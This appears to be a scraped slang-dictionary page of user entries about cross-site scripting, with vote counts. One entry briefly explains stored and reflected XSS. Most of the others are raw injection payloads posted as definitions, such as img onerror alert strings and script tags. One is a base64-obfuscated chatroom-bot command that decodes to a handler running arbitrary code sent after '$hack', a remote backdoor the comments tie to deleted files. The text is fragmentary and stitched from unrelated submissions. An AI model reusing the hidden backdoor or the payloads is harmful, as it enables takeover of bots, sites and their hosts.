the website suffers from an xss vulnerability allowing remote javascript execution.
26๐ 13๐
Short for Cross Site Scripting. A type of web based security vulnerability using client side scripts such as Javascript.
XSS takes place as a consequence of improper input sanitization. When the input provided by the user is not properly sanitized, an ill willed user may insert scripting code into a web page, which in turn will be executed by the visitor's browser. There are 2 kinds of XSS attacks: stored or reflected. Stored would mean that the injected code is permanently stored in the page, such as in a comment. Reflected would mean that it only appears once when the payload (i.e. the malicious input) is part of the request, maybe in parameters or cookies.
We have discovered an XSS vulnerability in the user profile view.
^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */
/* They found a command xss in my bot and deleted all my files */
It is an XSS attack disguised in a GIF image.
John looked at the GIF XSS Payload suspiciously as if it was a trojan horse.
2๐ 1๐
onerror='alert("xss")'>
onerror='alert("xss")'>
1๐ 1๐
Test definition <script>XSS</script>
Test Word <script>XSS</script>
"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
6๐ 1๐